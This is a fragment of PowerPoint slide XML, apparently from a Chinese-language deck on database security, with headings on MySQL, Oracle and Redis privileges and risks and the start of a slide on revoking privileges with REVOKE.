          <p:cNvPr id="98" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45DC24F5-7E3F-4B76-9E74-4FEA8FA0581B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6529419" y="2233054"/>
            <a:ext cx="2446901" cy="418794"/>
            <a:chOff x="535" y="663"/>
            <a:chExt cx="1142" cy="272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="99" name="Group 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD0B75A-FA5F-4D97-A0C8-3462F3D2D141}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="535" y="663"/>
              <a:ext cx="1139" cy="272"/>
              <a:chOff x="2272" y="1479"/>
              <a:chExt cx="1363" cy="1800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="101" name="AutoShape 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D93195-8153-46DC-98B9-F56C861510A6}"/>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02" name="AutoShape 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A652AB0-5CF1-41E0-8C89-78A1A5351086}"/>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03" name="AutoShape 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99F270DF-945D-46BE-9769-111D3702B8B5}"/>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04" name="AutoShape 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35672EB7-34D1-4AA3-BD2B-C2E025452520}"/>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00" name="Rectangle 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D513D27-395A-49E8-BBB1-8B80D8FB3811}"/>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en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Mysql</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>权限与设置</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="040404"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="105" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A531407F-C162-4443-86DF-DF87316D3540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6525844" y="3031646"/>
            <a:ext cx="2589213" cy="418794"/>
            <a:chOff x="535" y="663"/>
            <a:chExt cx="1213" cy="272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="106" name="Group 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4ED82CC-F31B-4B15-8390-DED9870E59F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="535" y="663"/>
              <a:ext cx="1139" cy="272"/>
              <a:chOff x="2272" y="1479"/>
              <a:chExt cx="1363" cy="1800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="108" name="AutoShape 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCFB90A9-58B8-480C-82CE-C06CE982664B}"/>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09" name="AutoShape 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5267FBC1-7C0D-4E98-A751-A330DDDD7821}"/>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10" name="AutoShape 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC922F6B-2DFF-4F89-AE63-3249FE1F411D}"/>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11" name="AutoShape 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C861CD4-2FEC-41B3-821D-4CCD4F380D09}"/>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07" name="Rectangle 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02DC5054-C145-4F8C-BB06-B84B0705DCA8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="586" y="663"/>
              <a:ext cx="1162" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Mysql</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>内置函数风险</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="040404"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="112" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1829D341-24E4-48F3-B2ED-EC09E5A4902E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477110" y="3627003"/>
            <a:ext cx="2457120" cy="418794"/>
            <a:chOff x="535" y="663"/>
            <a:chExt cx="1142" cy="272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="113" name="Group 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10E97B37-F5E8-471A-AB05-929E444AC1D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="535" y="663"/>
              <a:ext cx="1139" cy="272"/>
              <a:chOff x="2272" y="1479"/>
              <a:chExt cx="1363" cy="1800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115" name="AutoShape 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7CD58A5-D050-4429-AD5F-471C203E641C}"/>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16" name="AutoShape 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B196827-0358-4449-B67E-1D6A4934B1BE}"/>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dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="117" name="AutoShape 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86792EFC-C11E-423A-9DFE-1A54A9A37808}"/>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18" name="AutoShape 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861E43DA-DC46-4164-ABFE-C2B1CFA7EEE9}"/>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14" name="Rectangle 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{332F07EF-3D87-4D4F-8574-18446BB82090}"/>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en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Oracle</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>角色与权限</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="040404"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="126" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E201233-8515-4AA5-B58A-F6D7FB584AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6491050" y="4369066"/>
            <a:ext cx="2478842" cy="418794"/>
            <a:chOff x="535" y="663"/>
            <a:chExt cx="1142" cy="272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="127" name="Group 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776E19D6-03D8-46D4-9134-A6E2AB7A1ED0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="535" y="663"/>
              <a:ext cx="1139" cy="272"/>
              <a:chOff x="2272" y="1479"/>
              <a:chExt cx="1363" cy="1800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129" name="AutoShape 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CB93441-D46D-455A-BA92-6CF5E9E1E088}"/>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30" name="AutoShape 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B9274EE-255D-4375-99FD-5DA79E7A0621}"/>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31" name="AutoShape 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE60444A-9E83-4A39-B369-41071C59E85C}"/>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32" name="AutoShape 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29C97B3E-3C74-48AC-8E10-46DBA137992B}"/>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28" name="Rectangle 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBD30153-C1F0-45D9-BA47-A67C3ADE6BCF}"/>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en-US" altLang="zh-CN" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Oracle</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>安全风险</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="040404"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="AutoShape 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD6F0D6-A974-42FE-B163-55630C2D99C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6046486" y="2413252"/>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134" name="AutoShape 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84957C22-F149-4042-9E5D-F75444EF15CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6037940" y="3783778"/>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59" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3494818E-1469-40A2-80CB-F5894FE6771C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1213779" y="4944142"/>
            <a:ext cx="2148832" cy="64770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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="040404"/>
                </a:solidFill>
              </a:rPr>
              <a:t>非关系型数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{439E1044-71AC-40DF-A4F3-ECF5BD96F45E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4103855" y="4987656"/>
            <a:ext cx="1646188"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en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1187FE5D-85FB-4EAD-AB55-0B47747E3CD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6460418" y="4831713"/>
            <a:ext cx="2486270" cy="418794"/>
            <a:chOff x="535" y="663"/>
            <a:chExt cx="1142" cy="272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="88" name="Group 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A4A6681-0943-45BE-BAE0-A33D3F1ABCF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="535" y="663"/>
              <a:ext cx="1139" cy="272"/>
              <a:chOff x="2272" y="1479"/>
              <a:chExt cx="1363" cy="1800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="90" name="AutoShape 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37C286A-DD26-4699-A60D-86D92CFBCC63}"/>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19" name="AutoShape 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8550F71E-8870-4459-A568-D95CC0D100F2}"/>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dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="120" name="AutoShape 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BFA311A-5ADB-4A65-AAFF-91B1166D6CF9}"/>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21" name="AutoShape 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91AE1AC8-CF27-4B37-9113-2BDADF3B1A4B}"/>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89" name="Rectangle 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C66AB436-D0F0-4943-8B9A-F5AD1CCF7EF7}"/>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en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Redis</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>权限设置</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="040404"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="122" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BE21345-2F91-4348-A4BB-4A8763673D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6474358" y="5573776"/>
            <a:ext cx="2641638" cy="418794"/>
            <a:chOff x="535" y="663"/>
            <a:chExt cx="1217" cy="272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="123" name="Group 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F618CE73-B54D-4D42-99E5-F9F61B3E018C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="535" y="663"/>
              <a:ext cx="1139" cy="272"/>
              <a:chOff x="2272" y="1479"/>
              <a:chExt cx="1363" cy="1800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="125" name="AutoShape 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3F588D-4C90-478E-A81F-AA3C6C3453A0}"/>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35" name="AutoShape 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F689D90-8645-4326-96DF-03404C10F1F7}"/>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36" name="AutoShape 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63FDB8A0-4542-4DC7-88A9-AFC856492144}"/>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37" name="AutoShape 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B370B151-175F-4F85-850A-5E5FE6925644}"/>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24" name="Rectangle 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA06A966-5352-4B22-B11E-0700EF91EB8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="586" y="663"/>
              <a:ext cx="1166" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Redis</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="040404"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>未授权访问风险</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="040404"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="AutoShape 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8514824-9F55-4FC5-8C42-548C6D7C0C02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6021248" y="4988488"/>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139" name="AutoShape 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ACD6F64-8BE4-4CAB-A132-764F3E8FED1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3636609" y="4972097"/>
            <a:ext cx="292606" cy="657984"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="918362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700808"/>
            <a:ext cx="10972800" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>撤销权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
              <a:t>撤销权限可以删除某个用户已经授予的权限。撤销权限使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"/>
              <a:t>REVOKE</a:t>
            </a:r>
            <a:r>
